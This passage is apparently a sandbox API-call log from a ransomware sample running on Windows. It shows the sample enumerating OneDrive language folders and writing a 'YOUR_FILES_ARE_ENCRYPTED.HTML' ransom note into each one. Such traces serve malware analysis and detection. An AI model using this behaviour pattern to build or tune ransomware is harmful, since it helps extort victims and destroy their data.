pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.464] GetProcessHeap () returned 0x600000 [0113.464] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\el\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.465] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.466] CloseHandle (hObject=0x32c) returned 1 [0113.466] GetProcessHeap () returned 0x600000 [0113.466] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.466] GetProcessHeap () returned 0x600000 [0113.466] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.466] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x778ac20d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78176e22, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78176e22, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="en", cAlternateFileName="")) returned 1 [0113.466] StrStrIW (lpFirst="en", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.466] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en") returned 78 [0113.466] GetProcessHeap () returned 0x600000 [0113.466] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.466] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en" [0113.466] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\*" [0113.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x778ac20d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78176e22, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78176e22, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.467] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x778ac20d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78176e22, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78176e22, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.467] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78176e22, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78176e22, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7820f937, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.467] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.467] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.467] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.467] lstrlenW (lpString=".mui") returned 4 [0113.467] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.467] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78176e22, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78176e22, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7820f937, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.467] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.467] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.467] GetProcessHeap () returned 0x600000 [0113.468] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\en\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.468] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.469] CloseHandle (hObject=0x32c) returned 1 [0113.469] GetProcessHeap () returned 0x600000 [0113.469] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.469] GetProcessHeap () returned 0x600000 [0113.469] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.470] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7850a56c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7850a56c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7850a56c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="en-gb", cAlternateFileName="")) returned 1 [0113.470] StrStrIW (lpFirst="en-gb", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.470] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb") returned 81 [0113.470] GetProcessHeap () returned 0x600000 [0113.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.471] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb" [0113.471] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\*" [0113.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7850a56c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7850a56c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78b265bb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.471] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7850a56c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7850a56c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78b265bb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.471] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b265bb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78b265bb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78be52ff, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x144c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.472] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.472] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.472] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.472] lstrlenW (lpString=".mui") returned 4 [0113.472] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.472] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b265bb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78b265bb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78be52ff, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x144c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.472] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.472] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.472] GetProcessHeap () returned 0x600000 [0113.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\en-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.473] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.474] CloseHandle (hObject=0x32c) returned 1 [0113.474] GetProcessHeap () returned 0x600000 [0113.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.474] GetProcessHeap () returned 0x600000 [0113.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.475] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78be52ff, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78be52ff, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78be52ff, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="es", cAlternateFileName="")) returned 1 [0113.475] StrStrIW (lpFirst="es", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.475] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es") returned 78 [0113.475] GetProcessHeap () returned 0x600000 [0113.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.475] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es" [0113.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\*" [0113.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78be52ff, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78be52ff, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78d62a39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78be52ff, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78be52ff, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x78d62a39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d62a39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78d62a39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x794d5ee8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.476] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.476] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.476] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.476] lstrlenW (lpString=".mui") returned 4 [0113.476] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.476] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d62a39, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x78d62a39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x794d5ee8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.476] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.476] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.476] GetProcessHeap () returned 0x600000 [0113.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.477] WriteFile (in: hFile=0x32c, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.478] CloseHandle (hObject=0x32c) returned 1 [0113.478] GetProcessHeap () returned 0x600000 [0113.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.478] GetProcessHeap () returned 0x600000 [0113.478] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.478] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794fc152, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x794fc152, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x794fc152, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="et", cAlternateFileName="")) returned 1 [0113.478] StrStrIW (lpFirst="et", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.478] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et") returned 78 [0113.478] GetProcessHeap () returned 0x600000 [0113.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.479] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et" [0113.479] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\*" [0113.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794fc152, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x794fc152, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x79c23223, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.479] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794fc152, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x794fc152, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x79c23223, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="..", cAlternateFileName="")) returned 1 [0113.479] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c23223, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x79c23223, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x79cbbda6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14ac0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.479] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.479] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.479] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.479] lstrlenW (lpString=".mui") returned 4 [0113.479] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.479] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c23223, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x79c23223, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x79cbbda6, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14ac0, dwReserved0=0x19e010, dwReserved1=0x173a5f0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.479] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.479] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.480] GetProcessHeap () returned 0x600000 